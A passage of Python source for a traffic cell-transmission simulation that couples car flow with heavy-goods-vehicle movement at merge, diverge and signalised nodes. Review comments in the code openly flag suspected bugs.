previousStatuses[mergeToLinkIx][0] = previousStatuses[mergeToLinkIx][0] + \
previousStatuses[toBeDistributedLinkIx][-2]
#print 'Merge linkIx:', mergeFromIxs[ml]
#print 'currentStatuses[ml][0] a ', currentStatuses[mergeToLinkIx][0]
break
else:
previousStatuses[mergeToLinkIx][0] = min(CapacityForMergeTo - previousStatuses[mergeToLinkIx][1], receivingMaxflow)
#print 'currentStatuses[ml][0] b ', currentStatuses[mergeToLinkIx][0]
self.previousStatuses = previousStatuses
#print 'Mergemodel ctm pre sta 4',self.previousStatuses[4]
def divergeModel(self):
previousStatuses = self.previousStatuses
linkMaxFlows = self.linkMaxFlows
linkCapacitys = self.linkCapacitys# still Number of Lanes
linkIDs = self.linkIDs
divergeToIxs = self.divergeToIxs
divergeToIxsList = self.divergeToIxsList
turningRatiosList = self.turningRatiosDiverge
for dl in range(len(divergeToIxs)):
divergeFromLinkIx = divergeToIxs[dl]
CapacityOfDivergeFrom = linkCapacitys[divergeFromLinkIx]
MaximalFlowofDivergeFrom = linkMaxFlows[divergeFromLinkIx]
turningRatios = turningRatiosList[dl]
toBeDistributedLinks = divergeToIxsList[dl]
restrictedSendingByOutgoings = MaximalFlowofDivergeFrom
#define the sending ability,
for ogl in range(len(toBeDistributedLinks)):
divergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[divergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[divergeToLinkIx]
restrictedSendingByOutgoings = restrictedSendingByOutgoings - \
max(MaximalFlowofDivergeTo - \
(CapacityOfDivergeTo - previousStatuses[divergeToLinkIx][1])/turningRatios[ogl], 0)
#build the virtual cell for incoming / diverge from links
overallsendingAbility = min(previousStatuses[divergeFromLinkIx][-2], max(restrictedSendingByOutgoings,0))
previousStatuses[divergeFromLinkIx][-1] = CapacityOfDivergeFrom - overallsendingAbility
#build the virtual cell for outgoing / diverge to links
for ogl in range(len(toBeDistributedLinks)):
divergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[divergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[divergeToLinkIx]
previousStatuses[divergeToLinkIx][0] = \
min(turningRatios[ogl]*overallsendingAbility,\
MaximalFlowofDivergeTo, \
CapacityOfDivergeTo - previousStatuses[divergeToLinkIx][1])
self.previousStatuses = previousStatuses
def ExtraDivergeModel(self, timeStep):
previousStatuses = self.previousStatuses
linkMaxFlows = self.linkMaxFlows
linkCapacitys = self.linkCapacitys# still Number of Lanes
extraDivergeToIxs = self.extraDivergeToIxs
extraDivergeToIxsList = self.extraDivergeToIxsList
turningRatiosList = self.turningRatiosExtraDiverge
signalPlans = self.signalPlans
timeStepInCycle = timeStep
for dl in range(len(extraDivergeToIxs)):
divergeFromLinkIx = extraDivergeToIxs[dl]
CapacityOfDivergeFrom = linkCapacitys[divergeFromLinkIx]
MaximalFlowofDivergeFrom = linkMaxFlows[divergeFromLinkIx]
turningRatios = turningRatiosList[dl]
toBeDistributedLinks = extraDivergeToIxsList[dl]
restrictedSendingByOutgoings = MaximalFlowofDivergeFrom
if signalPlans[dl][timeStepInCycle] == 0:
previousStatuses[divergeFromLinkIx][-1] = CapacityOfDivergeFrom
for ogl in range(len(toBeDistributedLinks)):
extraDivergeToLinkIx = toBeDistributedLinks[ogl]
previousStatuses[extraDivergeToLinkIx][0] = 0
else:
#define the sending ability,
for ogl in range(len(toBeDistributedLinks)):
extraDivergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[extraDivergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[extraDivergeToLinkIx]
restrictedSendingByOutgoings = restrictedSendingByOutgoings - \
max(MaximalFlowofDivergeTo - \
(CapacityOfDivergeTo - previousStatuses[extraDivergeToLinkIx][1])/turningRatios[ogl], 0)
#build the virtual cell for incoming / diverge from links
overallsendingAbility = min(previousStatuses[divergeFromLinkIx][-2], max(restrictedSendingByOutgoings,0))
previousStatuses[divergeFromLinkIx][-1] = CapacityOfDivergeFrom - overallsendingAbility
#build the virtual cell for outgoing / diverge to links
for ogl in range(len(toBeDistributedLinks)):
extraDivergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[extraDivergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[extraDivergeToLinkIx]
previousStatuses[extraDivergeToLinkIx][0] = \
min(turningRatios[ogl]*overallsendingAbility,\
MaximalFlowofDivergeTo, \
CapacityOfDivergeTo - previousStatuses[extraDivergeToLinkIx][1])
self.previousStatuses = previousStatuses
class CNSMixModel:
def __init__(self, ctm):
self.linkIDs = ctm.linkIDs
self.linkCapacitys = ctm.linkCapacitys
self.linkMaxFlows = ctm.linkMaxFlows
self.SpeedsList = []
#self.CTM_currentStatuses = ctm.currentStatuses
self.CTM_previousStatuses = ctm.previousStatuses
self.CTM_currentFlows = ctm.currentFlows
#self.currentStatuses = []
self.previousStatuses = []
#self.currentFlows = []
self.previousFlows = []
self.SpeedsList = [0]*len(self.CTM_previousStatuses)
self.currentStatuses = [0]*len(self.CTM_previousStatuses)
#print 'currentStatuses length', len(self.currentStatuses)
self.currentFlows = [0]*len(self.CTM_currentFlows)
for nl in range(len(self.currentStatuses)):
self.SpeedsList[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentStatuses[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentFlows[nl] = [0]*len(self.CTM_currentFlows[nl])
#ID Index:
self.mergeFromIds = ctm.mergeFromIds
self.divergeToIds = ctm.divergeToIds
self.extraDivergeToIds = ctm.extraDivergeToIds
self.mergeFromIdsList = ctm.mergeFromIdsList
self.divergeToIdsList = ctm.divergeToIdsList
self.extraDivergeToIdsList = ctm.extraDivergeToIdsList
#IX Index:
self.mergeFromIxs = ctm.mergeFromIxs
self.divergeToIxs = ctm.divergeToIxs
self.extraDivergeToIxs = ctm.extraDivergeToIxs
self.mergeFromIxsList = ctm.mergeFromIxsList
self.divergeToIxsList = ctm.divergeToIxsList
self.extraDivergeToIxsList = ctm.extraDivergeToIxsList
self.isTurning = ctm.isTurning
self.isInLink = ctm.isInLink
self.isOutLink = ctm.isOutLink
self.isSignalized = ctm.isSignalized
self.turningRatiosDiverge = ctm.turningRatiosDiverge
self.turningRatiosExtraDiverge = ctm.turningRatiosExtraDiverge
#variable for evaluation:
self.stops = 0
self.overallStops = 0
def SpeedDiriving(self,ctm,timeStep):
# to decide if HGV can move forward:
# and initialize the statues and flows
self.CTM_previousStatuses = ctm.previousStatuses
self.CTM_currentFlows = ctm.currentFlows
self.previousStatuses = self.currentStatuses[:]
self.previousFlows = self.currentFlows[:]
self.SpeedsList = [0]*len(self.CTM_previousStatuses)
self.currentStatuses = [0]*len(self.CTM_previousStatuses)
self.currentFlows = [0]*len(self.CTM_currentFlows)
for nl in range(len(self.currentStatuses)):
self.SpeedsList[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentStatuses[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentFlows[nl] = [0]*len(self.CTM_currentFlows[nl])
for nl in range(len(self.SpeedsList)):
CTM_currentFlow = self.CTM_currentFlows[nl]
CTM_previousStatus = self.CTM_previousStatuses[nl]
maxFlow = self.linkMaxFlows[nl]
for nc in range(1,len(self.SpeedsList[nl])):
if CTM_currentFlow[nc-1] >= CTM_previousStatus[nc-1]*0.95 or math.fabs(CTM_currentFlow[nc-1]- maxFlow)<0.05:
self.SpeedsList[nl][nc] = 1
else:
self.SpeedsList[nl][nc] = 0
extraDivergeToIxs = ctm.extraDivergeToIxs
#extraDivergeToIxsList = ctm.extraDivergeToIxsList
#print 'extraDivergeToIxs',extraDivergeToIxs
#print 'extraDivergeToIxsList',extraDivergeToIxsList
#turningRatiosList = self.turningRatiosExtraDiverge
signalPlans = ctm.signalPlans
timeStepInCycle = timeStep
for dl in range(len(extraDivergeToIxs)):
divergeFromLinkIx = extraDivergeToIxs[dl]
if signalPlans[dl][timeStepInCycle] == 0:
self.SpeedsList[divergeFromLinkIx][-1] = 0
else:
self.SpeedsList[divergeFromLinkIx][-1] = 1
def HGVPositioning(self,HGVInputs):
#print 'HGVPositioning'
# here just some random input for test
#randomNumber = random.randint(0,100)
#if randomNumber>49:
#--------------------------------------------------------------------------------------------------------------manually data supply!!!!
HGVInputLinkIxs = [3,5,9,14,15,17,22,25,29,35,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,\
58,59,60,61,62,63,64,65,66,67,72,74,81,86,88,92,96,99,101,103,104,106,111,113,119,124,125,137,143,145,146,151]#need to check...................................................
for i in range(len(HGVInputLinkIxs)):
if len(HGVInputs[i])!=0:
linkIx = HGVInputLinkIxs[i]
HGVPositions = [0]*len(HGVInputs[i])
#print 'linkIx',linkIx
#print 'len(self.previousStatuses)',len(self.previousStatuses)
cellNumber = len(self.previousStatuses[linkIx])
for j in range(len(HGVPositions)):
HGVPositions[j] = int(HGVInputs[i][j]*cellNumber)
self.previousStatuses[linkIx][HGVPositions[j]] = self.previousStatuses[linkIx][HGVPositions[j]] + 1
def flowModel(self):
#calculate flow
for nl in range(len(self.currentFlows)):
maxFlow = int(self.linkMaxFlows[nl]*2)
for nc in range(1,len(self.SpeedsList[nl])):
if self.SpeedsList[nl][nc] == 1:
self.currentFlows[nl][nc-1] = max(0,int(min(self.previousStatuses[nl][nc-1], maxFlow, maxFlow-self.previousStatuses[nl][nc])))
else:
self.currentFlows[nl][nc-1] = 0
for ncc in range(1,len(self.SpeedsList[nl])-1):
self.currentStatuses[nl][ncc] = max(0,self.previousStatuses[nl][ncc] + self.currentFlows[nl][ncc-1] - self.currentFlows[nl][ncc])
def stopsEvaluation(self):
self.stops = 0
for i in range(len(self.previousFlows)):
for j in range(1,len(self.previousFlows[i])):
self.stops = self.stops - min((self.currentFlows[i][j]-self.previousFlows[i][j-1]),0)
self.overallStops = self.stops + self.overallStops
def initVcell(self):
for nl in range(len(self.previousStatuses)):
self.previousStatuses[nl][0] = 0
self.previousStatuses[nl][-1] = 0
    def mergeModel(self):
        """Resolve merge nodes for the HGV layer.

        For each merge node, HGVs waiting in the last real cell (index -2)
        of every upstream link compete for the space left in the first real
        cell of the downstream link.  Accepted vehicles are written into the
        downstream link's virtual input cell (index 0); each upstream link's
        virtual output cell (index -1) is filled so that flowModel() admits
        only as many more vehicles as were granted space here.
        """
        for nl in range(len(self.mergeFromIxs)):
            mergeToLinkIx = self.mergeFromIxs[nl]
            mergeFromLinksIxList = self.mergeFromIxsList[nl]
            mergeVolume = 0
            maxMergeVolume = 0
            restVolume = 0
            # Per-cell capacity of the downstream (merge-to) link.
            capacity_mtl = int(self.linkMaxFlows[mergeToLinkIx]*2)
            # Total HGVs queued in the last real cell of all upstream links.
            for nn in range(len(mergeFromLinksIxList)):
                mergeFromLinkIx = mergeFromLinksIxList[nn]
                mergeVolume = mergeVolume + self.previousStatuses[mergeFromLinkIx][-2]
            # Downstream link can only receive when its first real cell is
            # marked passable for this step.
            if self.SpeedsList[mergeToLinkIx][1] ==1:
                if mergeVolume <= capacity_mtl - self.previousStatuses[mergeToLinkIx][1]:
                    # Everything fits: accept the whole queue downstream and
                    # leave each upstream exit cell with its remaining space.
                    self.previousStatuses[mergeToLinkIx][0] = mergeVolume
                    for nn in range(len(mergeFromLinksIxList)):
                        mergeFromLinkIx = mergeFromLinksIxList[nn]
                        capacity_mfl = int(self.linkMaxFlows[mergeFromLinkIx]*2)
                        self.previousStatuses[mergeFromLinkIx][-1] = max(0,capacity_mfl - self.previousStatuses[mergeFromLinkIx][-2])
                else:
                    # Not enough downstream space: hand out the available
                    # space one vehicle at a time among randomly drawn
                    # upstream links.
                    maxMergeVolume = capacity_mtl - self.previousStatuses[mergeToLinkIx][1]
                    restVolume = maxMergeVolume
                    receivedVolume = 0
                    itN = 0
                    while restVolume>=1:
                        for nn in range(len(mergeFromLinksIxList)):
                            # NOTE(review): the random draw is used directly as
                            # a link index, whereas the other branches map the
                            # index through mergeFromLinksIxList first.
                            # Suspected bug -- confirm intended link selection.
                            mergeFromLinkIx = random.randint(0,len(mergeFromLinksIxList)-1)
                            capacity_mfl = int(self.linkMaxFlows[mergeFromLinkIx]*2)
                            if self.previousStatuses[mergeFromLinkIx][-1] < capacity_mfl:
                                self.previousStatuses[mergeFromLinkIx][-1] = self.previousStatuses[mergeFromLinkIx][-1] + 1
                                restVolume = restVolume -1
                                # NOTE(review): this stores the pre-decrement
                                # remainder, not the number of vehicles
                                # accepted (maxMergeVolume - restVolume).
                                # Suspected bug.
                                receivedVolume = restVolume +1
                            itN = itN+1
                            # NOTE(review): this break only exits the inner
                            # for-loop; the while keeps retrying one draw per
                            # pass, and never terminates if no upstream exit
                            # cell ever has room.
                            if itN>len(mergeFromLinksIxList):
                                break
                    self.previousStatuses[mergeToLinkIx][0] = receivedVolume
            else:
                # Downstream blocked: nothing enters, and every upstream exit
                # cell is marked completely full so flowModel() admits zero.
                self.previousStatuses[mergeToLinkIx][0] = 0
                for nn in range(len(mergeFromLinksIxList)):
                    mergeFromLinkIx = mergeFromLinksIxList[nn]
                    capacity_mfl = int(self.linkMaxFlows[mergeFromLinkIx]*2)
                    self.previousStatuses[mergeFromLinkIx][-1] = capacity_mfl
    def divergeModel(self):
        """Resolve diverge nodes for the HGV layer.

        Each HGV in the last real cell (index -2) of a diverge link picks a
        downstream link by sampling the cumulative turning-ratio
        distribution; it moves if that link's virtual input cell (index 0)
        still has room.  The diverge link's virtual output cell (index -1)
        is then set to capacity minus the number distributed, limiting how
        many vehicles flowModel() lets advance into it this step.
        """
        for nl in range(len(self.divergeToIxs)):
            divergeFromLinkIx = self.divergeToIxs[nl]
            divergeTolinksIxList = self.divergeToIxsList[nl]
            turningRatios = self.turningRatiosDiverge[nl]
            allValue = 0.0
            distributedVehicles = 0
            # Normalise the turning ratios and build the cumulative split
            # points used for inverse-CDF sampling below.
            for nn in range(len(turningRatios)):
                allValue = allValue + turningRatios[nn]
            spiltPoints = [0]*len(turningRatios)
            splitPoint = 0.0
            for nn in range(len(turningRatios)):
                spiltPoints[nn] = splitPoint + turningRatios[nn]/allValue
                splitPoint = splitPoint + turningRatios[nn]/allValue
            #print 'split point', spiltPoints
            NoOfVehicles = 0
            NoOfVehicles = self.previousStatuses[divergeFromLinkIx][-2]
            irN = 0
            while NoOfVehicles>=1:
                # NOTE(review): irN caps the while at len(turningRatios)
                # iterations, so at most that many vehicles can leave this
                # node per step regardless of queue length -- confirm intent.
                if irN >=len(turningRatios):
                    break
                irN = irN+1
                # One uniform draw per vehicle; the first split point above
                # the draw selects the target link.
                randomDecision = random.random()
                for nn in range(len(turningRatios)):
                    if randomDecision < spiltPoints[nn]:
                        distributedLinkIx = divergeTolinksIxList[nn]
                        capacity = int(self.linkMaxFlows[distributedLinkIx]*2)
                        # Move only if the chosen link's input cell has room;
                        # otherwise the draw is consumed and the vehicle waits.
                        if self.previousStatuses[distributedLinkIx][0] < capacity:
                            self.previousStatuses[distributedLinkIx][0] =\
                            self.previousStatuses[distributedLinkIx][0] + 1
                            NoOfVehicles = NoOfVehicles -1
                        break
            distributedVehicles = self.previousStatuses[divergeFromLinkIx][-2] - NoOfVehicles
            self.previousStatuses[divergeFromLinkIx][-1] = int(self.linkMaxFlows[divergeFromLinkIx]*2) - distributedVehicles
    def extraDivergemodel(self):
        """Resolve signal-controlled diverge nodes for the HGV layer.

        Same sampling scheme as divergeModel(), but gated by the signal
        state stored in SpeedsList[link][-1] (set in SpeedDiriving).  On
        red, the diverge link's exit cell is filled to capacity (blocking
        its outflow in flowModel()) and every downstream virtual input cell
        is cleared.
        """
        #the same as diverge
        for nl in range(len(self.extraDivergeToIxs)):
            divergeFromLinkIx = self.extraDivergeToIxs[nl]
            divergeTolinksIxList = self.extraDivergeToIxsList[nl]
            turningRatios = self.turningRatiosExtraDiverge[nl]
            allValue = 0.0
            distributedVehicles = 0
            # Green: distribute queued vehicles over the downstream links.
            if self.SpeedsList[divergeFromLinkIx][-1] == 1:
                # Cumulative split points for inverse-CDF sampling.
                for nn in range(len(turningRatios)):
                    allValue = allValue + turningRatios[nn]
                spiltPoints = [0]*len(turningRatios)
                splitPoint = 0.0
                for nn in range(len(turningRatios)):
                    spiltPoints[nn] = splitPoint + turningRatios[nn]/allValue
                    splitPoint = splitPoint + turningRatios[nn]/allValue
                NoOfVehicles = 0
                NoOfVehicles = self.previousStatuses[divergeFromLinkIx][-2]
                testno = 0
                while NoOfVehicles>=1:
                    # NOTE(review): testno caps the while at
                    # len(turningRatios) iterations, limiting throughput per
                    # node per step -- confirm intent (same as divergeModel).
                    if testno >= len(turningRatios):
                        break
                    testno = testno +1
                    randomDecision = random.random()
                    for nn in range(len(turningRatios)):
                        if randomDecision < spiltPoints[nn]:
                            distributedLinkIx = divergeTolinksIxList[nn]
                            capacity = int(self.linkMaxFlows[distributedLinkIx]*2)
                            # Move only if the target input cell has room.
                            if self.previousStatuses[distributedLinkIx][0] < capacity:
                                self.previousStatuses[distributedLinkIx][0] =\
                                self.previousStatuses[distributedLinkIx][0] + 1
                                NoOfVehicles = NoOfVehicles -1
                            break
                distributedVehicles = self.previousStatuses[divergeFromLinkIx][-2] - NoOfVehicles
                self.previousStatuses[divergeFromLinkIx][-1] = int(self.linkMaxFlows[divergeFromLinkIx]*2) - distributedVehicles
            else:
                # Red: block the exit cell entirely and clear the downstream
                # virtual input cells.
                self.previousStatuses[divergeFromLinkIx][-1] = int(self.linkMaxFlows[divergeFromLinkIx]*2)
                for nn in range(len(turningRatios)):
                    distributedLinkIx = divergeTolinksIxList[nn]
                    self.previousStatuses[distributedLinkIx][0] = 0
def pretest():
    """Build and return a CellTransmissionModel with the network loaded
    and the CTM structures initialised (no simulation run)."""
    model = CellTransmissionModel()
    model.readNetwork()
    model.buildCTM()
    return model
def maintest(sps,vehcleInputs,HGVInputs):
    """Run one full simulation of the coupled car/HGV cell-transmission
    model and return (overall car waiting time, overall HGV stops).

    sps          -- signal plans (e.g. produced by a GA optimiser)
    vehcleInputs -- car traffic demand per time step
    HGVInputs    -- HGV injection positions, applied once at step 0
    """
    # Car layer: cell-transmission model of the network.
    carModel = CellTransmissionModel()
    carModel.readNetwork()
    carModel.buildCTM()
    carModel.signalPlans = sps
    # HGV layer rides on top of the car model's state.
    hgvModel = CNSMixModel(carModel)
    carModel.initFlow_0(vehcleInputs)
    for step in range(simulationTime):
        # Car-layer update for this step.
        carModel.initFlow(vehcleInputs)
        carModel.mergeModel()
        carModel.divergeModel()
        carModel.ExtraDivergeModel(step)
        carModel.flowModel()
        carModel.waitingTimeEvaluation()
        # HGV-layer update, driven by the fresh car-layer state.
        hgvModel.SpeedDiriving(carModel, step)
        if step == 0:
            # HGVs are injected only once, at the start of the run.
            hgvModel.HGVPositioning(HGVInputs)
        hgvModel.initVcell()
        hgvModel.mergeModel()
        hgvModel.divergeModel()
        hgvModel.extraDivergemodel()
        hgvModel.flowModel()
        hgvModel.stopsEvaluation()
    return carModel.overallWaitingTime, hgvModel.overallStops
#(overallWaitingTime, mcns.overallStops) = maintest(sps)
if __name__ == '__main__':
    # NOTE(review): maintest() requires three positional arguments
    # (sps, vehcleInputs, HGVInputs); calling it with none, as here, raises
    # a TypeError.  Supply real inputs before running this module directly.
    maintest()
"johannes@vonoswald.de"
] | johannes@vonoswald.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.